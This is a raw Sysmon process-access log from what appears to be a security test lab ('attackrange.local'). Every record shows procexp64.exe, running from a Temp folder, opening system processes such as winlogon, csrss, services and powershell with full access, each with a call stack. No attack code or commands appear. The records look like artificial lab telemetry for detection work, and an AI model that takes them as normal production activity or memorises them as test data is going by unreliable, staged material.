15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790587Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790586Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790585Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790584Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790583Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790582Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790707Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790706Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790705Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790704Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790703Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790702Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790701Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790700Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790699Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790698Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790697Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790696Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790695Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790694Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790693Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790692Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790691Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790690Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790689Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790688Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790687Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790686Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790685Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790684Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790683Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790682Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790681Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790680Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790679Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790678Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790677Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 